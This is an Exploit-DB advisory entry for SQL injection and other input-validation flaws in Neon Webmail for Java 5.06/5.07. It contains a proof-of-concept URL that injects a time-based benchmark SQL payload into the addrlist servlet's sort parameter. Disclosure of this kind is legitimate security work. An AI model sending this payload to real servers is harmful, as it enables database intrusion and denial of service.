NeoSys Neon Webmail for Java 5.06/5.07 - 'addrlist' Servlet Multiple SQL Injections

EDB-ID:

28607

CVE:

2006-4953

EDB Verified:

Author:

Tan Chew Keong

Type:

webapps

Exploit:   /  

Platform:

JSP

Date:

2006-09-20

Vulnerable App: 
source: https://www.securityfocus.com/bid/20109/info
  
Neon WebMail is prone to multiple input-validation vulnerabilities because it fails to sanitize user-supplied input. These issues include:
  
- an arbitrary-file-upload vulnerability
- an arbitrary-email-manipulation vulnerability
- multiple SQL-injection vulnerabilities
- an unauthorized-access vulnerability
- multiple directory-traversal vulnerabilities
- an HTML-injection vulnerability. 
  
An attacker can exploit these issues to compromise the affected application.
  
Versions 5.06 and 5.07 (build.200607050) are vulnerable to these issue; prior versions may also be affected.

http://www.example.com/neonwebmail/addrlist?PAGE=1&sysid=0&adr_sortkey=rand(benchmark(1000000000000, sha1('123456781234567812345678')))&adr_sortkey_desc= ID, SELECT * FROM T_ADDR_BOOK WHERE ID = 'username' ORDER BYrand(benchmark(1000000000000,sha1('123456781234567812345678'))),SYSID DESC
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services